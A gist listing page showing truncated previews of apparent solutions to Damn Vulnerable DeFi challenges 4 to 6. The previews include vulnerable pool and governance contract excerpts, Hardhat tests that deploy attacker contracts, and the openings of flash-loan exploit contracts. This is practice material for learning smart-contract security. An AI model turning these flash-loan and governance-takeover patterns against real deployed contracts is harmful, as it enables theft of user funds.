az0mb13
/ dvd5_ans2.js
Created
January 29, 2023 08:19
View dvd5_ans2.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| const RewardExploit = await ethers.getContractFactory('RewardExploit', attacker); | |
| const exploit = await RewardExploit.deploy(attacker.address, this.flashLoanPool.address, this.liquidityToken.address, this.rewarderPool.address, this.rewardToken.address); | |
| await ethers.provider.send("evm_increaseTime", [5 * 24 * 60 * 60]); // 5 days | |
| await exploit.exploit(TOKENS_IN_LENDER_POOL); | |
| }); |
az0mb13
/ dvd5_ans1.sol
Created
January 29, 2023 08:07
View dvd5_ans1.sol
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| interface IFlashLoanerPool { | |
| function flashLoan(uint256 amount) external; | |
| } | |
| interface IDamnValuableToken { | |
| function transfer(address recipient, uint256 amount) |
View dvd5.sol
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract TheRewarderPool { | |
| // Minimum duration of each round of rewards in seconds | |
| uint256 private constant REWARDS_ROUND_MIN_DURATION = 5 days; | |
| ... | |
| function deposit(uint256 amountToDeposit) external { | |
| require(amountToDeposit > 0, "Must deposit tokens"); | |
| accToken.mint(msg.sender, amountToDeposit); | |
| distributeRewards(); |
az0mb13
/ dvd6_ans2.js
Created
January 28, 2023 18:41
View dvd6_ans2.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| const SelfieExploitFactory = await ethers.getContractFactory('SelfieExploit', attacker); | |
| const exploitContract = await SelfieExploitFactory.deploy(this.pool.address, attacker.address, this.governance.address); | |
| await exploitContract.attack(TOKENS_IN_POOL); | |
| await ethers.provider.send("evm_increaseTime", [2 * 24 * 60 * 60]); | |
| await exploitContract.execute(); | |
| }); |
az0mb13
/ dvd6_ans1.sol
Created
January 28, 2023 18:29
View dvd6_ans1.sol
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| interface ISelfiePool { | |
| function flashLoan(uint256 borrowAmount) external; | |
| } | |
| interface ISimpleGovernance { | |
| function executeAction(uint256 actionId) external payable; |
az0mb13
/ dvd6_2.sol
Last active
January 28, 2023 18:23
View dvd6_2.sol
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| ... | |
| contract SimpleGovernance { | |
| ... | |
| struct GovernanceAction { | |
| address receiver; |
az0mb13
/ dvd6_1.sol
Created
January 28, 2023 18:02
View dvd6_1.sol
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
| import "@openzeppelin/contracts/token/ERC20/extensions/ERC20Snapshot.sol"; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| import "./SimpleGovernance.sol"; | |
| /** | |
| * @title SelfiePool |
az0mb13
/ dvd4_ans2.js
Created
January 26, 2023 15:56
View dvd4_ans2.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| const AttackerContract = await ethers.getContractFactory("AttackerContract", attacker); | |
| this.exploit = await AttackerContract.deploy(await this.pool.address); | |
| this.exploit.connect(attacker).exploit(ETHER_IN_POOL); | |
| }); |
az0mb13
/ dvd4_ans1.sol
Created
January 26, 2023 15:52
View dvd4_ans1.sol
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract AttackerContract { | |
| SideEntranceLenderPool pool; | |
| address payable attacker; | |
| constructor(address _pool) { | |
| pool = SideEntranceLenderPool(_pool); | |
| attacker = payable(msg.sender); | |
| } | |
| function exploit(uint256 amount) public { |
View dvd4.sol
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| interface IFlashLoanEtherReceiver { | |
| function execute() external payable; | |
| } | |
| /** |
NewerOlder